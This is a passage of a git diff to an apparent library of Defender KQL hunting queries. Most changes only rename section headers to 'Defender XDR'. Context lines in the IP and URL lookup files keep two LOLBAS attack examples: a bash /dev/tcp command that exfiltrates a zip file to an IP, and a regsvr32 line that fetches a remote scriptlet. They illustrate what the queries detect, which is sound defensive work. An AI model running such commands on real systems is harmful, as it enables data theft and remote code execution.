+25,4 @@ CloudAuditEvents | where ActionType == "CloudAuditEventDelete" | summarize TotalActions = count(), arg_max(Timestamp, *) by bin(Timestamp, BinSize), Account, DataSource | where TotalActions > Threshold -``` \ No newline at end of file +``` diff --git a/DFIR/Defender For Endpoint/MDE - AllProcessesCreatedByMaliciousFile.md b/DFIR/Defender For Endpoint/MDE - AllProcessesCreatedByMaliciousFile.md index fdf5d54..620d760 100644 --- a/DFIR/Defender For Endpoint/MDE - AllProcessesCreatedByMaliciousFile.md +++ b/DFIR/Defender For Endpoint/MDE - AllProcessesCreatedByMaliciousFile.md @@ -1,6 +1,6 @@ # Find all the processes a file has created and the associated FileNames, FileLocations and SHA1 hashes that the file has had. ---- -### Defender For Endpoint +### Defender XDR ``` // For the best results use SHA1 diff --git a/DFIR/Defender For Endpoint/MDE - Antivirus-Detections-by-Compromised-Device.md b/DFIR/Defender For Endpoint/MDE - Antivirus-Detections-by-Compromised-Device.md index 6657bba..ee9cd65 100644 --- a/DFIR/Defender For Endpoint/MDE - Antivirus-Detections-by-Compromised-Device.md +++ b/DFIR/Defender For Endpoint/MDE - Antivirus-Detections-by-Compromised-Device.md @@ -1,6 +1,6 @@ # Find the DFE Antivirus events on compromised devices. FileInfo is stored in JSON format. ---- -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevices = dynamic (["laptop1", "server2"]); diff --git a/DFIR/Defender For Endpoint/MDE - BrowserLaunchedToOpenUrlByCompromisedDevice.md b/DFIR/Defender For Endpoint/MDE - BrowserLaunchedToOpenUrlByCompromisedDevice.md index f29b049..25a005a 100644 --- a/DFIR/Defender For Endpoint/MDE - BrowserLaunchedToOpenUrlByCompromisedDevice.md +++ b/DFIR/Defender For Endpoint/MDE - BrowserLaunchedToOpenUrlByCompromisedDevice.md @@ -1,6 +1,6 @@ # Find all the activities that launched a browser to open a URL from a compromised device. -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "laptop.contoso.com"; diff --git a/DFIR/Defender For Endpoint/MDE - Connections-Made-By-Office-Compromised-Device.md b/DFIR/Defender For Endpoint/MDE - Connections-Made-By-Office-Compromised-Device.md index 05e8a60..bd198bb 100644 --- a/DFIR/Defender For Endpoint/MDE - Connections-Made-By-Office-Compromised-Device.md +++ b/DFIR/Defender For Endpoint/MDE - Connections-Made-By-Office-Compromised-Device.md @@ -1,6 +1,6 @@ # Find all the connections that have been made by Office from a compromised device. ---- -### Defender For Endpoint +### Defender XDR ``` let ConnectionsMadeByOfficeRegKey = @'\SOFTWARE\Microsoft\Office\16.0\Common\Internet\Server Cache'; diff --git a/DFIR/Defender For Endpoint/MDE - FileEnrichmentOnSuspiciousFile.md b/DFIR/Defender For Endpoint/MDE - FileEnrichmentOnSuspiciousFile.md index de7d44e..0a51b61 100644 --- a/DFIR/Defender For Endpoint/MDE - FileEnrichmentOnSuspiciousFile.md +++ b/DFIR/Defender For Endpoint/MDE - FileEnrichmentOnSuspiciousFile.md @@ -1,6 +1,6 @@ # File Enrichment on Suspicious File ---- -### Defender For Endpoint +### Defender XDR ``` let SuspiciousDownloadName = 'GoogleUpdateSetup.exe'; diff --git a/DFIR/Defender For Endpoint/MDE - IPLookup.md b/DFIR/Defender For Endpoint/MDE - IPLookup.md index 421e9b9..b7da45a 100644 --- a/DFIR/Defender For Endpoint/MDE - IPLookup.md +++ b/DFIR/Defender For Endpoint/MDE - IPLookup.md @@ -14,7 +14,7 @@ bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24' #### References - https://lolbas-project.github.io/lolbas/Binaries/Rundll32/ - https://lolbas-project.github.io/lolbas/Binaries/Bash/ -## Defender For Endpoint +## Defender XDR ``` // Set the IP address you are trying to lookup. let LookupIP = "127.0.0.1"; diff --git a/DFIR/Defender For Endpoint/MDE - InboundConnectionsCompromisedDevice.md b/DFIR/Defender For Endpoint/MDE - InboundConnectionsCompromisedDevice.md index 4edb634..68730e4 100644 --- a/DFIR/Defender For Endpoint/MDE - InboundConnectionsCompromisedDevice.md +++ b/DFIR/Defender For Endpoint/MDE - InboundConnectionsCompromisedDevice.md @@ -8,7 +8,7 @@ This query can be used to get a quick overview of all the inbound connections th #### References - https://www.microsoft.com/en-us/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/ -## Defender For Endpoint +## Defender XDR ``` // Add the device you are investigating in the CompromisedDevice variable let CompromisedDevice = "test.domain.tld"; diff --git a/DFIR/Defender For Endpoint/MDE - InternalConnectionsMadeByCompromisedDevice.md b/DFIR/Defender For Endpoint/MDE - InternalConnectionsMadeByCompromisedDevice.md index 4f0ec8a..89e8024 100644 --- a/DFIR/Defender For Endpoint/MDE - InternalConnectionsMadeByCompromisedDevice.md +++ b/DFIR/Defender For Endpoint/MDE - InternalConnectionsMadeByCompromisedDevice.md @@ -9,7 +9,7 @@ This query will most likely, depending on the setup of your organization always This is query is aimed to be part of your inciden triage, to discover or exclude potential lateral movement in an efficient manner. -## Defender For Endpoint +## Defender XDR ``` // Add the device you are investigating in the CompromisedDevice variable let CompromisedDevice = "compromiseddevice"; diff --git a/DFIR/Defender For Endpoint/MDE - MD365-EmailAttachmentsSendFromCompromisedMailbox.md b/DFIR/Defender For Endpoint/MDE - MD365-EmailAttachmentsSendFromCompromisedMailbox.md index 28be11d..11ae887 100644 --- a/DFIR/Defender For Endpoint/MDE - MD365-EmailAttachmentsSendFromCompromisedMailbox.md +++ b/DFIR/Defender For Endpoint/MDE - MD365-EmailAttachmentsSendFromCompromisedMailbox.md @@ -1,6 +1,6 @@ # Find all attachments that have been send from a compromised mailbox and which devices have opened that attachment. ---- -### Defender For Endpoint +### Defender XDR ``` let CompromisedMailbox = "test@test.com"; diff --git a/DFIR/Defender For Endpoint/MDE - MostRecentPowershellExecutionsByCompromisedDevice.md b/DFIR/Defender For Endpoint/MDE - MostRecentPowershellExecutionsByCompromisedDevice.md index ba6a358..25f897a 100644 --- a/DFIR/Defender For Endpoint/MDE - MostRecentPowershellExecutionsByCompromisedDevice.md +++ b/DFIR/Defender For Endpoint/MDE - MostRecentPowershellExecutionsByCompromisedDevice.md @@ -1,6 +1,6 @@ # Show the last 100 Powershell executions from a compromised device ---- -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "laptop.contoso.com"; diff --git a/DFIR/Defender For Endpoint/MDE - NetActivities.md b/DFIR/Defender For Endpoint/MDE - NetActivities.md index b52c3e1..0550f1d 100644 --- a/DFIR/Defender For Endpoint/MDE - NetActivities.md +++ b/DFIR/Defender For Endpoint/MDE - NetActivities.md @@ -1,6 +1,6 @@ # List all net(1).exe activities on a host ---- -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "azurewin2022"; diff --git a/DFIR/Defender For Endpoint/MDE - Open-SMB-Connections-By-Compromised-Device.md b/DFIR/Defender For Endpoint/MDE - Open-SMB-Connections-By-Compromised-Device.md index 799cbc1..5876f1c 100644 --- a/DFIR/Defender For Endpoint/MDE - Open-SMB-Connections-By-Compromised-Device.md +++ b/DFIR/Defender For Endpoint/MDE - Open-SMB-Connections-By-Compromised-Device.md @@ -1,6 +1,6 @@ # Show all successful SMB connections of a compromised device ---- -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "laptop1"; diff --git a/DFIR/Defender For Endpoint/MDE - Registry-Run-Keys-Forensics.md b/DFIR/Defender For Endpoint/MDE - Registry-Run-Keys-Forensics.md index af8b58f..044f9e5 100644 --- a/DFIR/Defender For Endpoint/MDE - Registry-Run-Keys-Forensics.md +++ b/DFIR/Defender For Endpoint/MDE - Registry-Run-Keys-Forensics.md @@ -1,6 +1,6 @@ # Forensics on Registry Run keys in Windows. Registry Run keys can be used to establish persistence on a device. ---- -### Defender For Endpoint +### Defender XDR ``` let RegistryRunKeys = dynamic diff --git a/DFIR/Defender For Endpoint/MDE - TriggeredASREventsFromCompromisedDevice.md b/DFIR/Defender For Endpoint/MDE - TriggeredASREventsFromCompromisedDevice.md index 984b022..b8debc2 100644 --- a/DFIR/Defender For Endpoint/MDE - TriggeredASREventsFromCompromisedDevice.md +++ b/DFIR/Defender For Endpoint/MDE - TriggeredASREventsFromCompromisedDevice.md @@ -1,6 +1,6 @@ # Find all the ASR events that have triggered from a compromised device -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "laptop1"; diff --git a/DFIR/Defender For Endpoint/MDE - URLLookup.md b/DFIR/Defender For Endpoint/MDE - URLLookup.md index d2472d9..e383543 100644 --- a/DFIR/Defender For Endpoint/MDE - URLLookup.md +++ b/DFIR/Defender For Endpoint/MDE - URLLookup.md @@ -19,7 +19,7 @@ cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redca - https://www.bleepingcomputer.com/news/security/windows-10-background-image-tool-can-be-abused-to-download-malware/ - https://lolbas-project.github.io/lolbas/Binaries/Cmd/ -## Defender For Endpoint +## Defender XDR ``` // Set the URL you are trying to lookup. // Lookup in this query is done with a contains, if this results in to many false positives add www. before the rest of the url. diff --git a/DFIR/Defender For Endpoint/MDE - UrlsOpenedWithOutlookFromCompromisedDevice.md b/DFIR/Defender For Endpoint/MDE - UrlsOpenedWithOutlookFromCompromisedDevice.md index cf27400..c769779 100644 --- a/DFIR/Defender For Endpoint/MDE - UrlsOpenedWithOutlookFromCompromisedDevice.md +++ b/DFIR/Defender For Endpoint/MDE - UrlsOpenedWithOutlookFromCompromisedDevice.md @@ -1,6 +1,6 @@ # Find all the activities that launched a browser to open a URL from a compromised device. -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "laptop.contoso.com"; diff --git a/DFIR/Defender For Identity/MDI - ADGroupAdditions.md b/DFIR/Defender For Identity/MDI - ADGroupAdditions.md index fb54b6a..75a8bb9 100644 --- a/DFIR/Defender For Identity/MDI - ADGroupAdditions.md +++ b/DFIR/Defender For Identity/MDI - ADGroupAdditions.md @@ -9,7 +9,7 @@ This query can be used to list all Active Directory group additions. The query u - https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-identitydirectoryevents-table?view=o365-worldwide - https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-default-user-accounts -## Defender For Endpoint +## Defender XDR ``` let Groups = dynamic(['Domain Admins', 'GroupName2']); // Add your sensitive groups to this list let SearchWindow = 48h; //Customizable h = hours, d = days diff --git a/DFIR/Defender For Identity/MDI - Devices-Accessed-By-Compromised-Device.md b/DFIR/Defender For Identity/MDI - Devices-Accessed-By-Compromised-Device.md index 92a8337..c4bd8da 100644 --- a/DFIR/Defender For Identity/MDI - Devices-Accessed-By-Compromised-Device.md +++ b/DFIR/Defender For Identity/MDI - Devices-Accessed-By-Compromised-Device.md @@ -1,6 +1,6 @@ # Find which devices have been accessed by a compromised device and which protocol was used to connect ---- -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "laptop.contoso.com"; diff --git a/DFIR/Defender For Identity/MDI - LDAPQueriesByCompromisedDevice.md b/DFIR/Defender For Identity/MDI - LDAPQueriesByCompromisedDevice.md index b2c6132..dfb1045 100644 --- a/DFIR/Defender For Identity/MDI - LDAPQueriesByCompromisedDevice.md +++ b/DFIR/Defender For Identity/MDI - LDAPQueriesByCompromisedDevice.md @@ -1,6 +1,6 @@ # Find all the executed LDAP queries from a compromised device -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "laptop1.com"; diff --git a/DFIR/Defender For Identity/MDI - Lateral-Movement-By-Compromised-Accounts.md b/DFIR/Defender For Identity/MDI - Lateral-Movement-By-Compromised-Accounts.md index 0fa298f..00edf68 100644 --- a/DFIR/Defender For Identity/MDI - Lateral-Movement-By-Compromised-Accounts.md +++ b/DFIR/Defender For Identity/MDI - Lateral-Movement-By-Compromised-Accounts.md @@ -1,6 +1,6 @@ # Find which devices have been accessed by a list of compromised accounts and which protocol was used to connect ---- -### Defender For Endpoint +### Defender XDR ``` let ComprimsedUsers = dynamic(['user1', 'user2']); diff --git a/DFIR/Defender For Office/MDE - MD365-EmailAttachmentsSendFromCompromisedMailbox.md b/DFIR/Defender For Office/MDE - MD365-EmailAttachmentsSendFromCompromisedMailbox.md index 28be11d..11ae887 100644 --- a/DFIR/Defender For Office/MDE - MD365-EmailAttachmentsSendFromCompromisedMailbox.md +++ b/DFIR/Defender For Office/MDE - MD365-EmailAttachmentsSendFromCompromisedMailbox.md @@ -1,6 +1,6 @@ # Find all attachments that have been send from a compromised mailbox and which devices have opened that attachment. ---- -### Defender For Endpoint +### Defender XDR ``` let CompromisedMailbox = "test@test.com"; diff --git a/DFIR/Defender For Office/MDO- FindRelatedMails.md b/DFIR/Defender For Office/MDO- FindRelatedMails.md index d76b30a..4ad42e9 100644 --- a/DFIR/Defender For Office/MDO- FindRelatedMails.md +++ b/DFIR/Defender For Office/MDO- FindRelatedMails.md @@ -8,7 +8,7 @@ The EmailClusterId which can be assigned to a mail is the identifier for the gro #### References - https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-emailevents-table?view=o365-worldwide -### Defender For Endpoint +### Defender XDR ``` let MaliciousEmailCluseriId = "3163234347533"; // Input the EmailClusterId here EmailEvents diff --git a/DFIR/Exposure Management/ExposureManagement - DeviceActivities.md b/DFIR/Exposure Management/ExposureManagement - DeviceActivities.md index c3a8877..50f439a 100644 --- a/DFIR/Exposure Management/ExposureManagement - DeviceActivities.md +++ b/DFIR/Exposure Management/ExposureManagement - DeviceActivities.md @@ -9,4 +9,4 @@ ExposureGraphEdges | where SourceNodeName == DeviceName | summarize Total = dcount(TargetNodeName), Details = make_set(TargetNodeName) by EdgeLabel, SourceNodeName | project Source = SourceNodeName, Action = EdgeLabel, Details, Tota -``` \ No newline at end of file +``` diff --git a/DFIR/ExposureManagement - DeviceActivities.md b/DFIR/ExposureManagement - DeviceActivities.md index c3a8877..50f439a 100644 --- a/DFIR/ExposureManagement - DeviceActivities.md +++ b/DFIR/ExposureManagement - DeviceActivities.md @@ -9,4 +9,4 @@ ExposureGraphEdges | where SourceNodeName == DeviceName | summarize Total = dcount(TargetNodeName), Details = make_set(TargetNodeName) by EdgeLabel, SourceNodeName | project Source = SourceNodeName, Action = EdgeLabel, Details, Tota -``` \ No newline at end of file +``` diff --git a/DFIR/MDE - AllProcessesCreatedByMaliciousFile.md b/DFIR/MDE - AllProcessesCreatedByMaliciousFile.md index fdf5d54..620d760 100644 --- a/DFIR/MDE - AllProcessesCreatedByMaliciousFile.md +++ b/DFIR/MDE - AllProcessesCreatedByMaliciousFile.md @@ -1,6 +1,6 @@ # Find all the processes a file has created and the associated FileNames, FileLocations and SHA1 hashes that the file has had. ---- -### Defender For Endpoint +### Defender XDR ``` // For the best results use SHA1 diff --git a/DFIR/MDE - Antivirus-Detections-by-Compromised-Device.md b/DFIR/MDE - Antivirus-Detections-by-Compromised-Device.md index 6657bba..ee9cd65 100644 --- a/DFIR/MDE - Antivirus-Detections-by-Compromised-Device.md +++ b/DFIR/MDE - Antivirus-Detections-by-Compromised-Device.md @@ -1,6 +1,6 @@ # Find the DFE Antivirus events on compromised devices. FileInfo is stored in JSON format. ---- -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevices = dynamic (["laptop1", "server2"]); diff --git a/DFIR/MDE - BrowserLaunchedToOpenUrlByCompromisedDevice.md b/DFIR/MDE - BrowserLaunchedToOpenUrlByCompromisedDevice.md index f29b049..25a005a 100644 --- a/DFIR/MDE - BrowserLaunchedToOpenUrlByCompromisedDevice.md +++ b/DFIR/MDE - BrowserLaunchedToOpenUrlByCompromisedDevice.md @@ -1,6 +1,6 @@ # Find all the activities that launched a browser to open a URL from a compromised device. -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "laptop.contoso.com"; diff --git a/DFIR/MDE - Connections-Made-By-Office-Compromised-Device.md b/DFIR/MDE - Connections-Made-By-Office-Compromised-Device.md index 05e8a60..bd198bb 100644 --- a/DFIR/MDE - Connections-Made-By-Office-Compromised-Device.md +++ b/DFIR/MDE - Connections-Made-By-Office-Compromised-Device.md @@ -1,6 +1,6 @@ # Find all the connections that have been made by Office from a compromised device. ---- -### Defender For Endpoint +### Defender XDR ``` let ConnectionsMadeByOfficeRegKey = @'\SOFTWARE\Microsoft\Office\16.0\Common\Internet\Server Cache'; diff --git a/DFIR/MDE - FileEnrichmentOnSuspiciousFile.md b/DFIR/MDE - FileEnrichmentOnSuspiciousFile.md index de7d44e..0a51b61 100644 --- a/DFIR/MDE - FileEnrichmentOnSuspiciousFile.md +++ b/DFIR/MDE - FileEnrichmentOnSuspiciousFile.md @@ -1,6 +1,6 @@ # File Enrichment on Suspicious File ---- -### Defender For Endpoint +### Defender XDR ``` let SuspiciousDownloadName = 'GoogleUpdateSetup.exe'; diff --git a/DFIR/MDE - IPLookup.md b/DFIR/MDE - IPLookup.md index 421e9b9..b7da45a 100644 --- a/DFIR/MDE - IPLookup.md +++ b/DFIR/MDE - IPLookup.md @@ -14,7 +14,7 @@ bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24' #### References - https://lolbas-project.github.io/lolbas/Binaries/Rundll32/ - https://lolbas-project.github.io/lolbas/Binaries/Bash/ -## Defender For Endpoint +## Defender XDR ``` // Set the IP address you are trying to lookup. let LookupIP = "127.0.0.1"; diff --git a/DFIR/MDE - InboundConnectionsCompromisedDevice.md b/DFIR/MDE - InboundConnectionsCompromisedDevice.md index 4edb634..68730e4 100644 --- a/DFIR/MDE - InboundConnectionsCompromisedDevice.md +++ b/DFIR/MDE - InboundConnectionsCompromisedDevice.md @@ -8,7 +8,7 @@ This query can be used to get a quick overview of all the inbound connections th #### References - https://www.microsoft.com/en-us/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/ -## Defender For Endpoint +## Defender XDR ``` // Add the device you are investigating in the CompromisedDevice variable let CompromisedDevice = "test.domain.tld"; diff --git a/DFIR/MDE - InternalConnectionsMadeByCompromisedDevice.md b/DFIR/MDE - InternalConnectionsMadeByCompromisedDevice.md index 4f0ec8a..89e8024 100644 --- a/DFIR/MDE - InternalConnectionsMadeByCompromisedDevice.md +++ b/DFIR/MDE - InternalConnectionsMadeByCompromisedDevice.md @@ -9,7 +9,7 @@ This query will most likely, depending on the setup of your organization always This is query is aimed to be part of your inciden triage, to discover or exclude potential lateral movement in an efficient manner. -## Defender For Endpoint +## Defender XDR ``` // Add the device you are investigating in the CompromisedDevice variable let CompromisedDevice = "compromiseddevice"; diff --git a/DFIR/MDE - MD365-EmailAttachmentsSendFromCompromisedMailbox.md b/DFIR/MDE - MD365-EmailAttachmentsSendFromCompromisedMailbox.md index 28be11d..11ae887 100644 --- a/DFIR/MDE - MD365-EmailAttachmentsSendFromCompromisedMailbox.md +++ b/DFIR/MDE - MD365-EmailAttachmentsSendFromCompromisedMailbox.md @@ -1,6 +1,6 @@ # Find all attachments that have been send from a compromised mailbox and which devices have opened that attachment. ---- -### Defender For Endpoint +### Defender XDR ``` let CompromisedMailbox = "test@test.com"; diff --git a/DFIR/MDE - MostRecentPowershellExecutionsByCompromisedDevice.md b/DFIR/MDE - MostRecentPowershellExecutionsByCompromisedDevice.md index ba6a358..25f897a 100644 --- a/DFIR/MDE - MostRecentPowershellExecutionsByCompromisedDevice.md +++ b/DFIR/MDE - MostRecentPowershellExecutionsByCompromisedDevice.md @@ -1,6 +1,6 @@ # Show the last 100 Powershell executions from a compromised device ---- -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "laptop.contoso.com"; diff --git a/DFIR/MDE - NetActivities.md b/DFIR/MDE - NetActivities.md index b52c3e1..0550f1d 100644 --- a/DFIR/MDE - NetActivities.md +++ b/DFIR/MDE - NetActivities.md @@ -1,6 +1,6 @@ # List all net(1).exe activities on a host ---- -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "azurewin2022"; diff --git a/DFIR/MDE - Open-SMB-Connections-By-Compromised-Device.md b/DFIR/MDE - Open-SMB-Connections-By-Compromised-Device.md index 799cbc1..5876f1c 100644 --- a/DFIR/MDE - Open-SMB-Connections-By-Compromised-Device.md +++ b/DFIR/MDE - Open-SMB-Connections-By-Compromised-Device.md @@ -1,6 +1,6 @@ # Show all successful SMB connections of a compromised device ---- -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "laptop1"; diff --git a/DFIR/MDE - Registry-Run-Keys-Forensics.md b/DFIR/MDE - Registry-Run-Keys-Forensics.md index af8b58f..044f9e5 100644 --- a/DFIR/MDE - Registry-Run-Keys-Forensics.md +++ b/DFIR/MDE - Registry-Run-Keys-Forensics.md @@ -1,6 +1,6 @@ # Forensics on Registry Run keys in Windows. Registry Run keys can be used to establish persistence on a device. ---- -### Defender For Endpoint +### Defender XDR ``` let RegistryRunKeys = dynamic diff --git a/DFIR/MDE - TriggeredASREventsFromCompromisedDevice.md b/DFIR/MDE - TriggeredASREventsFromCompromisedDevice.md index 984b022..b8debc2 100644 --- a/DFIR/MDE - TriggeredASREventsFromCompromisedDevice.md +++ b/DFIR/MDE - TriggeredASREventsFromCompromisedDevice.md @@ -1,6 +1,6 @@ # Find all the ASR events that have triggered from a compromised device -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "laptop1"; diff --git a/DFIR/MDE - URLLookup.md b/DFIR/MDE - URLLookup.md index d2472d9..e383543 100644 --- a/DFIR/MDE - URLLookup.md +++ b/DFIR/MDE - URLLookup.md @@ -19,7 +19,7 @@ cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redca - https://www.bleepingcomputer.com/news/security/windows-10-background-image-tool-can-be-abused-to-download-malware/ - https://lolbas-project.github.io/lolbas/Binaries/Cmd/ -## Defender For Endpoint +## Defender XDR ``` // Set the URL you are trying to lookup. // Lookup in this query is done with a contains, if this results in to many false positives add www. before the rest of the url. diff --git a/DFIR/MDE - UrlsOpenedWithOutlookFromCompromisedDevice.md b/DFIR/MDE - UrlsOpenedWithOutlookFromCompromisedDevice.md index cf27400..c769779 100644 --- a/DFIR/MDE - UrlsOpenedWithOutlookFromCompromisedDevice.md +++ b/DFIR/MDE - UrlsOpenedWithOutlookFromCompromisedDevice.md @@ -1,6 +1,6 @@ # Find all the activities that launched a browser to open a URL from a compromised device. -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "laptop.contoso.com"; diff --git a/DFIR/MDI - ADGroupAdditions.md b/DFIR/MDI - ADGroupAdditions.md index fb54b6a..75a8bb9 100644 --- a/DFIR/MDI - ADGroupAdditions.md +++ b/DFIR/MDI - ADGroupAdditions.md @@ -9,7 +9,7 @@ This query can be used to list all Active Directory group additions. The query u - https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-identitydirectoryevents-table?view=o365-worldwide - https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-default-user-accounts -## Defender For Endpoint +## Defender XDR ``` let Groups = dynamic(['Domain Admins', 'GroupName2']); // Add your sensitive groups to this list let SearchWindow = 48h; //Customizable h = hours, d = days diff --git a/DFIR/MDI - Devices-Accessed-By-Compromised-Device.md b/DFIR/MDI - Devices-Accessed-By-Compromised-Device.md index 92a8337..c4bd8da 100644 --- a/DFIR/MDI - Devices-Accessed-By-Compromised-Device.md +++ b/DFIR/MDI - Devices-Accessed-By-Compromised-Device.md @@ -1,6 +1,6 @@ # Find which devices have been accessed by a compromised device and which protocol was used to connect ---- -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "laptop.contoso.com"; diff --git a/DFIR/MDI - LDAPQueriesByCompromisedDevice.md b/DFIR/MDI - LDAPQueriesByCompromisedDevice.md index b2c6132..dfb1045 100644 --- a/DFIR/MDI - LDAPQueriesByCompromisedDevice.md +++ b/DFIR/MDI - LDAPQueriesByCompromisedDevice.md @@ -1,6 +1,6 @@ # Find all the executed LDAP queries from a compromised device -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "laptop1.com"; diff --git a/DFIR/MDI - Lateral-Movement-By-Compromised-Accounts.md b/DFIR/MDI - Lateral-Movement-By-Compromised-Accounts.md index 0fa298f..00edf68 100644 --- a/DFIR/MDI - Lateral-Movement-By-Compromised-Accounts.md +++ b/DFIR/MDI - Lateral-Movement-By-Compromised-Accounts.md @@ -1,6 +1,6 @@ # Find which devices have been accessed by a list of compromised accounts and which protocol was used to connect ---- -### Defender For Endpoint +### Defender XDR ``` let ComprimsedUsers = dynamic(['user1', 'user2']); diff --git a/DFIR/MDO- FindRelatedMails.md b/DFIR/MDO- FindRelatedMails.md index d76b30a..4ad42e9 100644 --- a/DFIR/MDO- FindRelatedMails.md +++ b/DFIR/MDO- FindRelatedMails.md @@ -8,7 +8,7 @@ The EmailClusterId which can be assigned to a mail is the identifier for the gro #### References - https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-emailevents-table?view=o365-worldwide -### Defender For Endpoint +### Defender XDR ``` let MaliciousEmailCluseriId = "3163234347533"; // Input the EmailClusterId here EmailEvents diff --git a/Defender For Cloud Apps/ATPDetectionEvents.md b/Defender For Cloud Apps/ATPDetectionEvents.md index 42a2abe..11d58d0 100644 --- a/Defender For Cloud Apps/ATPDetectionEvents.md +++ b/Defender For Cloud Apps/ATPDetectionEvents.md @@ -1,6 +1,6 @@ # ATP Detection events triggered -### Defender For Endpoint +### Defender XDR ``` CloudAppEvents diff --git a/Defender For Cloud Apps/AccountsWithMostImpersonatedActions.md b/Defender For Cloud Apps/AccountsWithMostImpersonatedActions.md index 41f2989..3e214b8 100644 --- a/Defender For Cloud Apps/AccountsWithMostImpersonatedActions.md +++ b/Defender For Cloud Apps/AccountsWithMostImpersonatedActions.md @@ -1,6 +1,6 @@ # List the top 100 accounts that have performed the most impersonated actions -### Defender For Endpoint +### Defender XDR ``` CloudAppEvents diff --git a/Defender For Cloud Apps/AnonymousProxyEvents.md b/Defender For Cloud Apps/AnonymousProxyEvents.md index b22193d..e6aaa0a 100644 --- a/Defender For Cloud Apps/AnonymousProxyEvents.md +++ b/Defender For Cloud Apps/AnonymousProxyEvents.md @@ -19,7 +19,7 @@ A attacker has taken control over an account and tries to mask its source. #### References - https://support.apple.com/en-us/HT212614 -## Defender For Endpoint +## Defender XDR ``` CloudAppEvents | where IsAnonymousProxy == 1 diff --git a/Defender For Cloud Apps/DefenseEvasionAlerts.md b/Defender For Cloud Apps/DefenseEvasionAlerts.md index 5c53efc..0727286 100644 --- a/Defender For Cloud Apps/DefenseEvasionAlerts.md +++ b/Defender For Cloud Apps/DefenseEvasionAlerts.md @@ -1,6 +1,6 @@ # Defense Evasion Alerts Generated by Defender For Endpoint -### Defender For Endpoint +### Defender XDR ``` CloudAppEvents diff --git a/Defender For Cloud Apps/ExternalAdminActivities.md b/Defender For Cloud Apps/ExternalAdminActivities.md index 44375ce..ed95777 100644 --- a/Defender For Cloud Apps/ExternalAdminActivities.md +++ b/Defender For Cloud Apps/ExternalAdminActivities.md @@ -1,6 +1,6 @@ # List the external admin activities -### Defender For Endpoint +### Defender XDR ``` CloudAppEvents diff --git a/Defender For Cloud Apps/FileContainingMalwareDetected.md b/Defender For Cloud Apps/FileContainingMalwareDetected.md index 25a6ca7..778a111 100644 --- a/Defender For Cloud Apps/FileContainingMalwareDetected.md +++ b/Defender For Cloud Apps/FileContainingMalwareDetected.md @@ -1,6 +1,6 @@ # File that contains malware detected by Defender For Cloud Apps -### Defender For Endpoint +### Defender XDR ``` CloudAppEvents diff --git a/Defender For Cloud Apps/HardUserDelete.md b/Defender For Cloud Apps/HardUserDelete.md index 117d294..49935bd 100644 --- a/Defender For Cloud Apps/HardUserDelete.md +++ b/Defender For Cloud Apps/HardUserDelete.md @@ -1,6 +1,6 @@ # Hunt for activities where Hard Delete user was performed ---- -### Defender For Endpoint +### Defender XDR ``` CloudAppEvents @@ -26,4 +26,4 @@ CloudAppEvents InitiatingUser = AccountDisplayName, DeletedUser -``` \ No newline at end of file +``` diff --git a/Defender For Cloud Apps/MITREBehaviors.md b/Defender For Cloud Apps/MITREBehaviors.md index 00e251c..ae9dbb2 100644 --- a/Defender For Cloud Apps/MITREBehaviors.md +++ b/Defender For Cloud Apps/MITREBehaviors.md @@ -11,7 +11,7 @@ An actor has taken over an account and performes multiple techniques to reach hi - https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-behaviorinfo-table?view=o365-worldwide - https://learn.microsoft.com/en-us/defender-cloud-apps/behaviors -## Defender For Endpoint +## Defender XDR ``` let AlertThreshold = 3; BehaviorInfo @@ -48,4 +48,4 @@ BehaviorInfo | project-away BehaviourIds, AccountObjectId1, AdditionalFields1, ActionType1, BehaviorId1, Categories1, DataSources1, TimeGenerated | project-reorder AccountObjectId, TotalTechniques, UniqueTechniques, Techniques, Categories, Description, DetectionSource | sort by AccountObjectId -``` \ No newline at end of file +``` diff --git a/Defender For Cloud Apps/MaliciousEmailDeliveredInMailbox.md b/Defender For Cloud Apps/MaliciousEmailDeliveredInMailbox.md index 59e1c0d..a9ae1d2 100644 --- a/Defender For Cloud Apps/MaliciousEmailDeliveredInMailbox.md +++ b/Defender For Cloud Apps/MaliciousEmailDeliveredInMailbox.md @@ -1,6 +1,6 @@ # Malicious email delivered in Microsoft 365 -### Defender For Endpoint +### Defender XDR ``` CloudAppEvents diff --git a/Defender For Cloud Apps/MostImpersonatorsByAccount.md b/Defender For Cloud Apps/MostImpersonatorsByAccount.md index 44e10fe..2e6c44f 100644 --- a/Defender For Cloud Apps/MostImpersonatorsByAccount.md +++ b/Defender For Cloud Apps/MostImpersonatorsByAccount.md @@ -1,6 +1,6 @@ # List the top 10 accounts that have the most impersonators -### Defender For Endpoint +### Defender XDR ``` CloudAppEvents diff --git a/Defender For Cloud Apps/OneDriveSyncFromRareIP.md b/Defender For Cloud 